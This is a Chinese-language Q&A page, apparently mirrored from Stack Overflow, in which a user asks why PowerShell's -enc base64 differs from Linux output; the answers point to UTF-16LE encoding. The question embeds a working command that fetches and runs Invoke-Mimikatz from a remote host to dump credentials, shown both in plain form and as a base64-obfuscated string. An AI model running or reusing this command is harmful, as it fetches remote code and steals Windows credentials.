代码之家  ›  专栏  ›  技术社区  ›  user134167

需要Powershell base64编码

base64 powershell bash
  •  1
  • user134167  · 技术社区  · 6 年前

    https://gist.github.com/gfoss/ca6aa37f97fd400ff14f . 运行mimikatz one: 

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m

    如果我在powershell提示符下直接运行它,它将正常工作。通过检查base64编码版本,我发现它也可以正常工作: 

    powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==

    然而,我不确定这个字符串是如何编码的。如果我尝试在Linux中对它进行编码,我会得到一个不同的字符串(我只是更改了引号以防止bash解释$): 

    echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/Powe
rSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A

SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=

    我应该使用什么编码使字符串与powershell完全兼容?

    2 回复  |  直到 6 年前
        1
  •  3
  •   Mathias R. Jessen    6 年前

    PowerShell希望base64字符串为 Unicode 编码-和 统一码 Windows是little endian UTF-16的行话。

    你可以用 iconv 皈依 UTF-16LE 如果需要在不访问.NET的情况下从linux shell对PowerShell命令进行编码: 

    iconv -f ASCII -t UTF-16LE filename.txt |base64 -w 0
        2
  •  2
  •   4c74356b41    6 年前

    使用powershell示例中的一个? 

    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))
    推荐文章
    g00dds  ·  如何在bash中从文件中的每一行解码base64?
    2 年前
    Bichito  ·  选择输入类型为file(pdf)的本地文件,并将其转换为base64字符串
    6 年前
    a4w  ·  使用base64编码大文件
    6 年前
    Abzelhan  ·  Java Thumbnailator库:发生IIOException:读取PNG元数据时出错
    6 年前
    Roni Gadot  ·  C-调用函数时出现问题
    6 年前
    Joe Everyone  ·  Base 64解码+编码产生不同的结果
    6 年前
    user9503597  ·  无法在模板上呈现PIL对象base64图像
    6 年前
    user8181313  ·  从数据库检索时图像损坏
    6 年前
    Ashish Gupta  ·  在我的节点中。js+Express API我有一个作为base64字符串的图像,如何将其作为多部分/表单数据发送给其他API
    6 年前
    aeronesto  ·  如何使用ingest attachment插件和JavaScript客户端在Elasticsearch 6.1中索引PDF?
    6 年前
    关于   移动版
    代码之家 - 一站式码农服务社区
    沪ICP备11025650号